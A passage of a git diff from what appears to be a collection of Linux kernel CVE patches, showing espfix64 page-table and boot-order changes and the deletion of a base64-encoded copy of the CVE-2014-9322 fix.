- 	{ VMEMMAP_START,        "Vmemmap" },
-+	{ ESPFIX_BASE_ADDR,	"ESPfix Area", 16 },
- 	{ __START_KERNEL_map,   "High Kernel Mapping" },
- 	{ MODULES_VADDR,        "Modules" },
- 	{ MODULES_END,          "End Modules" },
-@@ -163,7 +167,7 @@
- 		      pgprot_t new_prot, int level)
- {
- 	pgprotval_t prot, cur;
--	static const char units[] = "KMGTPE";
-+	static const char units[] = "BKMGTPE";
- 
- 	/*
- 	 * If we have a "break" in the series, we need to flush the state that
-@@ -178,6 +182,7 @@
- 		st->current_prot = new_prot;
- 		st->level = level;
- 		st->marker = address_markers;
-+		st->lines = 0;
- 		seq_printf(m, "---[ %s ]---\n", st->marker->name);
- 	} else if (prot != cur || level != st->level ||
- 		   st->current_address >= st->marker[1].start_address) {
-@@ -188,17 +193,21 @@
- 		/*
- 		 * Now print the actual finished series
- 		 */
--		seq_printf(m, "0x%0*lx-0x%0*lx   ",
--			   width, st->start_address,
--			   width, st->current_address);
-+		if (!st->marker->max_lines ||
-+		    st->lines < st->marker->max_lines) {
-+			seq_printf(m, "0x%0*lx-0x%0*lx   ",
-+				   width, st->start_address,
-+				   width, st->current_address);
- 
--		delta = (st->current_address - st->start_address) >> 10;
--		while (!(delta & 1023) && unit[1]) {
--			delta >>= 10;
--			unit++;
-+			delta = (st->current_address - st->start_address);
-+			while (!(delta & 1023) && unit[1]) {
-+				delta >>= 10;
-+				unit++;
-+			}
-+			seq_printf(m, "%9lu%c ", delta, *unit);
-+			printk_prot(m, st->current_prot, st->level);
- 		}
--		seq_printf(m, "%9lu%c ", delta, *unit);
--		printk_prot(m, st->current_prot, st->level);
-+		st->lines++;
- 
- 		/*
- 		 * We print markers for special areas of address space,
-@@ -206,7 +215,15 @@
- 		 * This helps in the interpretation.
- 		 */
- 		if (st->current_address >= st->marker[1].start_address) {
-+			if (st->marker->max_lines &&
-+			    st->lines > st->marker->max_lines) {
-+				unsigned long nskip =
-+					st->lines - st->marker->max_lines;
-+				seq_printf(m, "... %lu entr%s skipped ... \n",
-+					   nskip, nskip == 1 ? "y" : "ies");
-+			}
- 			st->marker++;
-+			st->lines = 0;
- 			seq_printf(m, "---[ %s ]---\n", st->marker->name);
- 		}
- 
-diff --git a/init/main.c b/init/main.c
-index 9484f4b..a9e4a76 100644
---- a/init/main.c
-+++ b/init/main.c
-@@ -605,6 +605,10 @@
- 	if (efi_enabled(EFI_RUNTIME_SERVICES))
- 		efi_enter_virtual_mode();
- #endif
-+#ifdef CONFIG_X86_64
-+	/* Should be run before the first non-init thread is created */
-+	init_espfix_bsp();
-+#endif
- 	thread_info_cache_init();
- 	cred_init();
- 	fork_init(totalram_pages);
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64
deleted file mode 100644
index 2c64bd6e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL0RvY3VtZW50YXRpb24veDg2L3g4Nl82NC9tbS50eHQgYi9Eb2N1bWVudGF0aW9uL3g4Ni94ODZfNjQvbW0udHh0CmluZGV4IDg4MTU4MmYuLmJkNDM3MDQgMTAwNjQ0Ci0tLSBhL0RvY3VtZW50YXRpb24veDg2L3g4Nl82NC9tbS50eHQKKysrIGIvRG9jdW1lbnRhdGlvbi94ODYveDg2XzY0L21tLnR4dApAQCAtMTIsNiArMTIsOCBAQAogZmZmZmU5MDAwMDAwMDAwMCAtIGZmZmZlOWZmZmZmZmZmZmYgKD00MCBiaXRzKSBob2xlCiBmZmZmZWEwMDAwMDAwMDAwIC0gZmZmZmVhZmZmZmZmZmZmZiAoPTQwIGJpdHMpIHZpcnR1YWwgbWVtb3J5IG1hcCAoMVRCKQogLi4uIHVudXNlZCBob2xlIC4uLgorZmZmZmZmMDAwMDAwMDAwMCAtIGZmZmZmZjdmZmZmZmZmZmYgKD0zOSBiaXRzKSAlZXNwIGZpeHVwIHN0YWNrcworLi4uIHVudXNlZCBob2xlIC4uLgogZmZmZmZmZmY4MDAwMDAwMCAtIGZmZmZmZmZmYTAwMDAwMDAgKD01MTIgTUIpICBrZXJuZWwgdGV4dCBtYXBwaW5nLCBmcm9tIHBoeXMgMAogZmZmZmZmZmZhMDAwMDAwMCAtIGZmZmZmZmZmZmY1ZmZmZmYgKD0xNTI1IE1CKSBtb2R1bGUgbWFwcGluZyBzcGFjZQogZmZmZmZmZmZmZjYwMDAwMCAtIGZmZmZmZmZmZmZkZmZmZmYgKD04IE1CKSB2c3lzY2FsbHMKZGlmZiAtLWdpdCBhL2FyY2gveDg2L2luY2x1ZGUvYXNtL3BndGFibGVfNjRfdHlwZXMuaCBiL2FyY2gveDg2L2luY2x1ZGUvYXNtL3BndGFibGVfNjRfdHlwZXMuaAppbmRleCAyZDg4MzQ0Li5iMTYwOWYyIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9wZ3RhYmxlXzY0X3R5cGVzLmgKKysrIGIvYXJjaC94ODYvaW5jbHVkZS9hc20vcGd0YWJsZV82NF90eXBlcy5oCkBAIC02MSw2ICs2MSw4IEBACiAjZGVmaW5lIE1PRFVMRVNfVkFERFIgICAgX0FDKDB4ZmZmZmZmZmZhMDAwMDAwMCwgVUwpCiAjZGVmaW5lIE1PRFVMRVNfRU5EICAgICAgX0FDKDB4ZmZmZmZmZmZmZjAwMDAwMCwgVUwpCiAjZGVmaW5lIE1PRFVMRVNfTEVOICAgKE1PRFVMRVNfRU5EIC0gTU9EVUxFU19WQUREUikKKyNkZWZpbmUgRVNQRklYX1BHRF9FTlRSWSBfQUMoLTIsIFVMKQorI2RlZmluZSBFU1BGSVhfQkFTRV9BRERSIChFU1BGSVhfUEdEX0VOVFJZIDw8IFBHRElSX1NISUZUKQogCiAjZGVmaW5lIEVBUkxZX0RZTkFNSUNfUEFHRV9UQUJMRVMJNjQKIApkaWZmIC0tZ2l0IGEvYXJjaC94ODYvaW5jbHVkZS9hc20vc2V0dXAuaCBiL2FyY2gveDg2L2luY2x1ZGUvYXNtL3NldHVwLmgKaW5kZXggYjdiZjM1MC4uOTM3OTdkMSAxMDA2NDQKLS0tIGEvYXJjaC94ODYvaW5jbHVkZS9hc20vc2V0dXAuaAorKysgYi9hcmNoL3g4Ni9pbmNsdWRlL2FzbS9zZXR1cC5oCkBAIC02MCw2ICs2MCw5IEBACiBzdGF0aWMgaW5saW5lIHZvaWQgeDg2X2NlNDEwMF9lYXJseV9zZXR1cCh2b2lkKSB7IH0KICNlbmRpZgogCitleHRlcm4gdm9pZCBpbml0X2VzcGZpeF9ic3Aodm9pZCk7CitleHRlcm4gdm9pZCBpbml0X2VzcGZpeF9hcCh2b2lkKTsKKwogI2lmbmRlZiBfU0VUVVAKIAogLyoKZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9NYWtlZmlsZSBiL2FyY2gveDg2L2tlcm5lbC9NYWtlZmlsZQppbmRleCA3YmQzYmQzLi4wZmRlMjkzIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvTWFrZWZpbGUKKysrIGIvYXJjaC94ODYva2VybmVsL01ha2VmaWxlCkBAIC0yNyw2ICsyNyw3IEBACiBvYmoteQkJCSs9IHN5c2NhbGxfJChCSVRTKS5vCiBvYmotJChDT05GSUdfWDg2XzY0KQkrPSB2c3lzY2FsbF82NC5vCiBvYmotJChDT05GSUdfWDg2XzY0KQkrPSB2c3lzY2FsbF9lbXVfNjQubworb2JqLSQoQ09ORklHX1g4Nl82NCkJKz0gZXNwZml4XzY0Lm8KIG9iai15CQkJKz0gYm9vdGZsYWcubyBlODIwLm8KIG9iai15CQkJKz0gcGNpLWRtYS5vIHF1aXJrcy5vIHRvcG9sb2d5Lm8ga2RlYnVnZnMubwogb2JqLXkJCQkrPSBhbHRlcm5hdGl2ZS5vIGk4MjUzLm8gcGNpLW5vbW11Lm8gaHdfYnJlYWtwb2ludC5vCmRpZmYgLS1naXQgYS9hcmNoL3g4Ni9rZXJuZWwvZW50cnlfNjQuUyBiL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCmluZGV4IDcyNzIwODkuLjc1Y2NkYzEgMTAwNjQ0Ci0tLSBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCisrKyBiL2FyY2gveDg2L2tlcm5lbC9lbnRyeV82NC5TCkBAIC01OCw2ICs1OCw3IEBACiAjaW5jbHVkZSA8YXNtL2FzbS5oPgogI2luY2x1ZGUgPGFzbS9jb250ZXh0X3RyYWNraW5nLmg+CiAjaW5jbHVkZSA8YXNtL3NtYXAuaD4KKyNpbmNsdWRlIDxhc20vcGd0YWJsZV90eXBlcy5oPgogI2luY2x1ZGUgPGxpbnV4L2Vyci5oPgogCiAvKiBBdm9pZCBfX0FTU0VNQkxFUl9fJ2lmeWluZyA8bGludXgvYXVkaXQuaD4ganVzdCBmb3IgdGhpcy4gICovCkBAIC0xMDU1LDggKzEwNTYsMTYgQEAKIAlSRVNUT1JFX0FSR1MgMSw4LDEKIAogaXJxX3JldHVybjoKKwkvKgorCSAqIEFyZSB3ZSByZXR1cm5pbmcgdG8gYSBzdGFjayBzZWdtZW50IGZyb20gdGhlIExEVD8gIE5vdGU6IGluCisJICogNjQtYml0IG1vZGUgU1M6UlNQIG9uIHRoZSBleGNlcHRpb24gc3RhY2sgaXMgYWx3YXlzIHZhbGlkLgorCSAqLworCXRlc3RiICQ0LChTUy1SSVApKCVyc3ApCisJam56IGlycV9yZXR1cm5fbGR0CisKK2lycV9yZXR1cm5faXJldDoKIAlJTlRFUlJVUFRfUkVUVVJOCi0JX0FTTV9FWFRBQkxFKGlycV9yZXR1cm4sIGJhZF9pcmV0KQorCV9BU01fRVhUQUJMRShpcnFfcmV0dXJuX2lyZXQsIGJhZF9pcmV0KQogCiAjaWZkZWYgQ09ORklHX1BBUkFWSVJUCiBFTlRSWShuYXRpdmVfaXJldCkKQEAgLTEwNjQsNiArMTA3MywzMCBAQAogCV9BU01fRVhUQUJMRShuYXRpdmVfaXJldCwgYmFkX2lyZXQpCiAjZW5kaWYKIAoraXJxX3JldHVybl9sZHQ6CisJcHVzaHFfY2ZpICVyYXgKKwlwdXNocV9jZmkgJXJkaQorCVNXQVBHUworCW1vdnEgUEVSX0NQVV9WQVIoZXNwZml4X3dhZGRyKSwlcmRpCisJbW92cSAlcmF4LCgwKjgpKCVyZGkpCS8qIFJBWCAqLworCW1vdnEgKDIqOCkoJXJzcCksJXJheAkvKiBSSVAgKi8KKwltb3ZxICVyYXgsKDEqOCkoJXJkaSkKKwltb3ZxICgzKjgpKCVyc3ApLCVyYXgJLyogQ1MgKi8KKwltb3ZxICVyYXgsKDIqOCkoJXJkaSkKKwltb3ZxICg0KjgpKCVyc3ApLCVyYXgJLyogUkZMQUdTICovCisJbW92cSAlcmF4LCgzKjgpKCVyZGkpCisJbW92cSAoNio4KSglcnNwKSwlcmF4CS8qIFNTICovCisJbW92cSAlcmF4LCg1KjgpKCVyZGkpCisJbW92cSAoNSo4KSglcnNwKSwlcmF4CS8qIFJTUCAqLworCW1vdnEgJXJheCwoNCo4KSglcmRpKQorCWFuZGwgJDB4ZmZmZjAwMDAsJWVheAorCXBvcHFfY2ZpICVyZGkKKwlvcnEgUEVSX0NQVV9WQVIoZXNwZml4X3N0YWNrKSwlcmF4CisJU1dBUEdTCisJbW92cSAlcmF4LCVyc3AKKwlwb3BxX2NmaSAlcmF4CisJam1wIGlycV9yZXR1cm5faXJldAorCiAJLnNlY3Rpb24gLmZpeHVwLCJheCIKIGJhZF9pcmV0OgogCS8qCkBAIC0xMTI3LDkgKzExNjAsNDEgQEAKIAljYWxsIHByZWVtcHRfc2NoZWR1bGVfaXJxCiAJam1wIGV4aXRfaW50cgogI2VuZGlmCi0KIAlDRklfRU5EUFJPQwogRU5EKGNvbW1vbl9pbnRlcnJ1cHQpCisKKwkvKgorCSAqIElmIElSRVQgdGFrZXMgYSBmYXVsdCBvbiB0aGUgZXNwZml4IHN0YWNrLCB0aGVuIHdlCisJICogZW5kIHVwIHByb21vdGluZyBpdCB0byBhIGRvdWJsZWZhdWx0LiAgSW4gdGhhdCBjYXNlLAorCSAqIG1vZGlmeSB0aGUgc3RhY2sgdG8gbWFrZSBpdCBsb29rIGxpa2Ugd2UganVzdCBlbnRlcmVkCisJICogdGhlICNHUCBoYW5kbGVyIGZyb20gdXNlciBzcGFjZSwgc2ltaWxhciB0byBiYWRfaXJldC4KKwkgKi8KKwlBTElHTgorX19kb19kb3VibGVfZmF1bHQ6CisJWENQVF9GUkFNRSAxIFJESSs4CisJbW92cSBSU1AoJXJkaSksJXJheAkJLyogVHJhcCBvbiB0aGUgZXNwZml4IHN0YWNrPyAqLworCXNhcnEgJFBHRElSX1NISUZULCVyYXgKKwljbXBsICRFU1BGSVhfUEdEX0VOVFJZLCVlYXgKKwlqbmUgZG9fZG91YmxlX2ZhdWx0CQkvKiBObywganVzdCBkZWxpdmVyIHRoZSBmYXVsdCAqLworCWNtcGwgJF9fS0VSTkVMX0NTLENTKCVyZGkpCisJam5lIGRvX2RvdWJsZV9mYXVsdAorCW1vdnEgUklQKCVyZGkpLCVyYXgKKwljbXBxICRpcnFfcmV0dXJuX2lyZXQsJXJheAorI2lmZGVmIENPTkZJR19QQVJBVklSVAorCWplIDFmCisJY21wcSAkbmF0aXZlX2lyZXQsJXJheAorI2VuZGlmCisJam5lIGRvX2RvdWJsZV9mYXVsdAkJLyogVGhpcyBzaG91bGRuJ3QgaGFwcGVuLi4uICovCisxOgorCW1vdnEgUEVSX0NQVV9WQVIoa2VybmVsX3N0YWNrKSwlcmF4CisJc3VicSAkKDYqOC1LRVJORUxfU1RBQ0tfT0ZGU0VUKSwlcmF4CS8qIFJlc2V0IHRvIG9yaWdpbmFsIHN0YWNrICovCisJbW92cSAlcmF4LFJTUCglcmRpKQorCW1vdnEgJDAsKCVyYXgpCQkJLyogTWlzc2luZyAobG9zdCkgI0dQIGVycm9yIGNvZGUgKi8KKwltb3ZxICRnZW5lcmFsX3Byb3RlY3Rpb24sUklQKCVyZGkpCisJcmV0cQorCUNGSV9FTkRQUk9DCitFTkQoX19kb19kb3VibGVfZmF1bHQpCisKIC8qCiAgKiBFbmQgb2Yga3Byb2JlcyBzZWN0aW9uCiAgKi8KQEAgLTEyOTgsNyArMTM2Myw3IEBACiB6ZXJvZW50cnkgYm91bmRzIGRvX2JvdW5kcwogemVyb2VudHJ5IGludmFsaWRfb3AgZG9faW52YWxpZF9vcAogemVyb2VudHJ5IGRldmljZV9ub3RfYXZhaWxhYmxlIGRvX2RldmljZV9ub3RfYXZhaWxhYmxlCi1wYXJhbm9pZGVycm9yZW50cnkgZG91YmxlX2ZhdWx0IGRvX2RvdWJsZV9mYXVsdAorcGFyYW5vaWRlcnJvcmVudHJ5IGRvdWJsZV9mYXVsdCBfX2RvX2RvdWJsZV9mYXVsdAogemVyb2VudHJ5IGNvcHJvY2Vzc29yX3NlZ21lbnRfb3ZlcnJ1biBkb19jb3Byb2Nlc3Nvcl9zZWdtZW50X292ZXJydW4KIGVycm9yZW50cnkgaW52YWxpZF9UU1MgZG9faW52YWxpZF9UU1MKIGVycm9yZW50cnkgc2VnbWVudF9ub3RfcHJlc2VudCBkb19zZWdtZW50X25vdF9wcmVzZW50CkBAIC0xNTg1LDcgKzE2NTAsNyBAQAogICovCiBlcnJvcl9rZXJuZWxzcGFjZToKIAlpbmNsICVlYngKLQlsZWFxIGlycV9yZXR1cm4oJXJpcCksJXJjeAorCWxlYXEgaXJxX3JldHVybl9pcmV0KCVyaXApLCVyY3gKIAljbXBxICVyY3gsUklQKzgoJXJzcCkKIAlqZSBlcnJvcl9zd2FwZ3MKIAltb3ZsICVlY3gsJWVheAkvKiB6ZXJvIGV4dGVuZCAqLwpkaWZmIC0tZ2l0IGEvYXJjaC94ODYva2VybmVsL2VzcGZpeF82NC5jIGIvYXJjaC94ODYva2VybmVsL2VzcGZpeF82NC5jCm5ldyBmaWxlIG1vZGUgMTAwNjQ0CmluZGV4IDAwMDAwMDAuLjhhNjRkYTMKLS0tIC9kZXYvbnVsbAorKysgYi9hcmNoL3g4Ni9rZXJuZWwvZXNwZml4XzY0LmMKQEAgLTAsMCArMSwyMDggQEAKKy8qIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tICoKKyAqCisgKiAgIENvcHlyaWdodCAyMDE0IEludGVsIENvcnBvcmF0aW9uOyBhdXRob3I6IEguIFBldGVyIEFudmluCisgKgorICogICBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeSBpdAorICogICB1bmRlciB0aGUgdGVybXMgYW5kIGNvbmRpdGlvbnMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlLAorICogICB2ZXJzaW9uIDIsIGFzIHB1Ymxpc2hlZCBieSB0aGUgRnJlZSBTb2Z0d2FyZSBGb3VuZGF0aW9uLgorICoKKyAqICAgVGhpcyBwcm9ncmFtIGlzIGRpc3RyaWJ1dGVkIGluIHRoZSBob3BlIGl0IHdpbGwgYmUgdXNlZnVsLCBidXQgV0lUSE9VVAorICogICBBTlkgV0FSUkFOVFk7IHdpdGhvdXQgZXZlbiB0aGUgaW1wbGllZCB3YXJyYW50eSBvZiBNRVJDSEFOVEFCSUxJVFkgb3IKKyAqICAgRklUTkVTUyBGT1IgQSBQQVJUSUNVTEFSIFBVUlBPU0UuICBTZWUgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvcgorICogICBtb3JlIGRldGFpbHMuCisgKgorICogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gKi8KKworLyoKKyAqIFRoZSBJUkVUIGluc3RydWN0aW9uLCB3aGVuIHJldHVybmluZyB0byBhIDE2LWJpdCBzZWdtZW50LCBvbmx5CisgKiByZXN0b3JlcyB0aGUgYm90dG9tIDE2IGJpdHMgb2YgdGhlIHVzZXIgc3BhY2Ugc3RhY2sgcG9pbnRlci4gIFRoaXMKKyAqIGNhdXNlcyBzb21lIDE2LWJpdCBzb2Z0d2FyZSB0byBicmVhaywgYnV0IGl0IGFsc28gbGVha3Mga2VybmVsIHN0YXRlCisgKiB0byB1c2VyIHNwYWNlLgorICoKKyAqIFRoaXMgd29ya3MgYXJvdW5kIHRoaXMgYnkgY3JlYXRpbmcgcGVyY3B1ICJtaW5pc3RhY2tzIiwgZWFjaCBvZiB3aGljaAorICogaXMgbWFwcGVkIDJeMTYgdGltZXMgNjRLIGFwYXJ0LiAgV2hlbiB3ZSBkZXRlY3QgdGhhdCB0aGUgcmV0dXJuIFNTIGlzCisgKiBvbiB0aGUgTERULCB3ZSBjb3B5IHRoZSBJUkVUIGZyYW1lIHRvIHRoZSBtaW5pc3RhY2sgYW5kIHVzZSB0aGUKKyAqIHJlbGV2YW50IGFsaWFzIHRvIHJldHVybiB0byB1c2Vyc3BhY2UuICBUaGUgbWluaXN0YWNrcyBhcmUgbWFwcGVkCisgKiByZWFkb25seSwgc28gaWYgdGhlIElSRVQgZmF1bHQgd2UgcHJvbW90ZSAjR1AgdG8gI0RGIHdoaWNoIGlzIGFuIElTVAorICogdmVjdG9yIGFuZCB0aHVzIGhhcyBpdHMgb3duIHN0YWNrOyB3ZSB0aGVuIGRvIHRoZSBmaXh1cCBpbiB0aGUgI0RGCisgKiBoYW5kbGVyLgorICoKKyAqIFRoaXMgZmlsZSBzZXRzIHVwIHRoZSBtaW5pc3RhY2tzIGFuZCB0aGUgcmVsYXRlZCBwYWdlIHRhYmxlcy4gIFRoZQorICogYWN0dWFsIG1pbmlzdGFjayBpbnZvY2F0aW9uIGlzIGluIGVudHJ5XzY0LlMuCisgKi8KKworI2luY2x1ZGUgPGxpbnV4L2luaXQuaD4KKyNpbmNsdWRlIDxsaW51eC9pbml0X3Rhc2suaD4KKyNpbmNsdWRlIDxsaW51eC9rZXJuZWwuaD4KKyNpbmNsdWRlIDxsaW51eC9wZXJjcHUuaD4KKyNpbmNsdWRlIDxsaW51eC9nZnAuaD4KKyNpbmNsdWRlIDxsaW51eC9yYW5kb20uaD4KKyNpbmNsdWRlIDxhc20vcGd0YWJsZS5oPgorI2luY2x1ZGUgPGFzbS9wZ2FsbG9jLmg+CisjaW5jbHVkZSA8YXNtL3NldHVwLmg+CisKKy8qCisgKiBOb3RlOiB3ZSBvbmx5IG5lZWQgNio4ID0gNDggYnl0ZXMgZm9yIHRoZSBlc3BmaXggc3RhY2ssIGJ1dCByb3VuZAorICogaXQgdXAgdG8gYSBjYWNoZSBsaW5lIHRvIGF2b2lkIHVubmVjZXNzYXJ5IHNoYXJpbmcuCisgKi8KKyNkZWZpbmUgRVNQRklYX1NUQUNLX1NJWkUJKDgqOFVMKQorI2RlZmluZSBFU1BGSVhfU1RBQ0tTX1BFUl9QQUdFCShQQUdFX1NJWkUvRVNQRklYX1NUQUNLX1NJWkUpCisKKy8qIFRoZXJlIGlzIGFkZHJlc3Mgc3BhY2UgZm9yIGhvdyBtYW55IGVzcGZpeCBwYWdlcz8gKi8KKyNkZWZpbmUgRVNQRklYX1BBR0VfU1BBQ0UJKDFVTCA8PCAoUEdESVJfU0hJRlQtUEFHRV9TSElGVC0xNikpCisKKyNkZWZpbmUgRVNQRklYX01BWF9DUFVTCQkoRVNQRklYX1NUQUNLU19QRVJfUEFHRSAqIEVTUEZJWF9QQUdFX1NQQUNFKQorI2lmIENPTkZJR19OUl9DUFVTID4gRVNQRklYX01BWF9DUFVTCisjIGVycm9yICJOZWVkIG1vcmUgdGhhbiBvbmUgUEdEIGZvciB0aGUgRVNQRklYIGhhY2siCisjZW5kaWYKKworI2RlZmluZSBQR0FMTE9DX0dGUCAoR0ZQX0tFUk5FTCB8IF9fR0ZQX05PVFJBQ0sgfCBfX0dGUF9SRVBFQVQgfCBfX0dGUF9aRVJPKQorCisvKiBUaGlzIGNvbnRhaW5zIHRoZSAqYm90dG9tKiBhZGRyZXNzIG9mIHRoZSBlc3BmaXggc3RhY2sgKi8KK0RFRklORV9QRVJfQ1BVX1JFQURfTU9TVExZKHVuc2lnbmVkIGxvbmcsIGVzcGZpeF9zdGFjayk7CitERUZJTkVfUEVSX0NQVV9SRUFEX01PU1RMWSh1bnNpZ25lZCBsb25nLCBlc3BmaXhfd2FkZHIpOworCisvKiBJbml0aWFsaXphdGlvbiBtdXRleCAtIHNob3VsZCB0aGlzIGJlIGEgc3BpbmxvY2s/ICovCitzdGF0aWMgREVGSU5FX01VVEVYKGVzcGZpeF9pbml0X211dGV4KTsKKworLyogUGFnZSBhbGxvY2F0aW9uIGJpdG1hcCAtIGVhY2ggcGFnZSBzZXJ2ZXMgRVNQRklYX1NUQUNLU19QRVJfUEFHRSBDUFVzICovCisjZGVmaW5lIEVTUEZJWF9NQVhfUEFHRVMgIERJVl9ST1VORF9VUChDT05GSUdfTlJfQ1BVUywgRVNQRklYX1NUQUNLU19QRVJfUEFHRSkKK3N0YXRpYyB2b2lkICplc3BmaXhfcGFnZXNbRVNQRklYX01BWF9QQUdFU107CisKK3N0YXRpYyBfX3BhZ2VfYWxpZ25lZF9ic3MgcHVkX3QgZXNwZml4X3B1ZF9wYWdlW1BUUlNfUEVSX1BVRF0KKwlfX2FsaWduZWQoUEFHRV9TSVpFKTsKKworc3RhdGljIHVuc2lnbmVkIGludCBwYWdlX3JhbmRvbSwgc2xvdF9yYW5kb207CisKKy8qCisgKiBUaGlzIHJldHVybnMgdGhlIGJvdHRvbSBhZGRyZXNzIG9mIHRoZSBlc3BmaXggc3RhY2sgZm9yIGEgc3BlY2lmaWMgQ1BVLgorICogVGhlIG1hdGggYWxsb3dzIGZvciBhIG5vbi1wb3dlci1vZi10d28gRVNQRklYX1NUQUNLX1NJWkUsIGluIHdoaWNoIGNhc2UKKyAqIHdlIGhhdmUgdG8gYWNjb3VudCBmb3Igc29tZSBhbW91bnQgb2YgcGFkZGluZyBhdCB0aGUgZW5kIG9mIGVhY2ggcGFnZS4KKyAqLworc3RhdGljIGlubGluZSB1bnNpZ25lZCBsb25nIGVzcGZpeF9iYXNlX2FkZHIodW5zaWduZWQgaW50IGNwdSkKK3sKKwl1bnNpZ25lZCBsb25nIHBhZ2UsIHNsb3Q7CisJdW5zaWduZWQgbG9uZyBhZGRyOworCisJcGFnZSA9IChjcHUgLyBFU1BGSVhfU1RBQ0tTX1BFUl9QQUdFKSBeIHBhZ2VfcmFuZG9tOworCXNsb3QgPSAoY3B1ICsgc2xvdF9yYW5kb20pICUgRVNQRklYX1NUQUNLU19QRVJfUEFHRTsKKwlhZGRyID0gKHBhZ2UgPDwgUEFHRV9TSElGVCkgKyAoc2xvdCAqIEVTUEZJWF9TVEFDS19TSVpFKTsKKwlhZGRyID0gKGFkZHIgJiAweGZmZmZVTCkgfCAoKGFkZHIgJiB+MHhmZmZmVUwpIDw8IDE2KTsKKwlhZGRyICs9IEVTUEZJWF9CQVNFX0FERFI7CisJcmV0dXJuIGFkZHI7Cit9CisKKyNkZWZpbmUgUFRFX1NUUklERSAgICAgICAgKDY1NTM2L1BBR0VfU0laRSkKKyNkZWZpbmUgRVNQRklYX1BURV9DTE9ORVMgKFBUUlNfUEVSX1BURS9QVEVfU1RSSURFKQorI2RlZmluZSBFU1BGSVhfUE1EX0NMT05FUyBQVFJTX1BFUl9QTUQKKyNkZWZpbmUgRVNQRklYX1BVRF9DTE9ORVMgKDY1NTM2LyhFU1BGSVhfUFRFX0NMT05FUypFU1BGSVhfUE1EX0NMT05FUykpCisKKyNkZWZpbmUgUEdUQUJMRV9QUk9UCSAgKChfS0VSTlBHX1RBQkxFICYgfl9QQUdFX1JXKSB8IF9QQUdFX05YKQorCitzdGF0aWMgdm9pZCBpbml0X2VzcGZpeF9yYW5kb20odm9pZCkKK3sKKwl1bnNpZ25lZCBsb25nIHJhbmQ7CisKKwkvKgorCSAqIFRoaXMgaXMgcnVuIGJlZm9yZSB0aGUgZW50cm9weSBwb29scyBhcmUgaW5pdGlhbGl6ZWQsCisJICogYnV0IHRoaXMgaXMgaG9wZWZ1bGx5IGJldHRlciB0aGFuIG5vdGhpbmcuCisJICovCisJaWYgKCFhcmNoX2dldF9yYW5kb21fbG9uZygmcmFuZCkpIHsKKwkJLyogVGhlIGNvbnN0YW50IGlzIGFuIGFyYml0cmFyeSBsYXJnZSBwcmltZSAqLworCQlyZHRzY2xsKHJhbmQpOworCQlyYW5kICo9IDB4YzM0NWM2YjcyZmQxNjEyM1VMOworCX0KKworCXNsb3RfcmFuZG9tID0gcmFuZCAlIEVTUEZJWF9TVEFDS1NfUEVSX1BBR0U7CisJcGFnZV9yYW5kb20gPSAocmFuZCAvIEVTUEZJWF9TVEFDS1NfUEVSX1BBR0UpCisJCSYgKEVTUEZJWF9QQUdFX1NQQUNFIC0gMSk7Cit9CisKK3ZvaWQgX19pbml0IGluaXRfZXNwZml4X2JzcCh2b2lkKQoreworCXBnZF90ICpwZ2RfcDsKKwlwdGV2YWxfdCBwdGVtYXNrOworCisJcHRlbWFzayA9IF9fc3VwcG9ydGVkX3B0ZV9tYXNrOworCisJLyogSW5zdGFsbCB0aGUgZXNwZml4IHB1ZCBpbnRvIHRoZSBrZXJuZWwgcGFnZSBkaXJlY3RvcnkgKi8KKwlwZ2RfcCA9ICZpbml0X2xldmVsNF9wZ3RbcGdkX2luZGV4KEVTUEZJWF9CQVNFX0FERFIpXTsKKwlwZ2RfcG9wdWxhdGUoJmluaXRfbW0sIHBnZF9wLCAocHVkX3QgKillc3BmaXhfcHVkX3BhZ2UpOworCisJLyogUmFuZG9taXplIHRoZSBsb2NhdGlvbnMgKi8KKwlpbml0X2VzcGZpeF9yYW5kb20oKTsKKworCS8qIFRoZSByZXN0IGlzIHRoZSBzYW1lIGFzIGZvciBhbnkgb3RoZXIgcHJvY2Vzc29yICovCisJaW5pdF9lc3BmaXhfYXAoKTsKK30KKwordm9pZCBpbml0X2VzcGZpeF9hcCh2b2lkKQoreworCXVuc2lnbmVkIGludCBjcHUsIHBhZ2U7CisJdW5zaWduZWQgbG9uZyBhZGRyOworCXB1ZF90IHB1ZCwgKnB1ZF9wOworCXBtZF90IHBtZCwgKnBtZF9wOworCXB0ZV90IHB0ZSwgKnB0ZV9wOworCWludCBuOworCXZvaWQgKnN0YWNrX3BhZ2U7CisJcHRldmFsX3QgcHRlbWFzazsKKworCS8qIFdlIG9ubHkgaGF2ZSB0byBkbyB0aGlzIG9uY2UuLi4gKi8KKwlpZiAobGlrZWx5KHRoaXNfY3B1X3JlYWQoZXNwZml4X3N0YWNrKSkpCisJCXJldHVybjsJCS8qIEFscmVhZHkgaW5pdGlhbGl6ZWQgKi8KKworCWNwdSA9IHNtcF9wcm9jZXNzb3JfaWQoKTsKKwlhZGRyID0gZXNwZml4X2Jhc2VfYWRkcihjcHUpOworCXBhZ2UgPSBjcHUvRVNQRklYX1NUQUNLU19QRVJfUEFHRTsKKworCS8qIERpZCBhbm90aGVyIENQVSBhbHJlYWR5IHNldCB0aGlzIHVwPyAqLworCXN0YWNrX3BhZ2UgPSBBQ0NFU1NfT05DRShlc3BmaXhfcGFnZXNbcGFnZV0pOworCWlmIChsaWtlbHkoc3RhY2tfcGFnZSkpCisJCW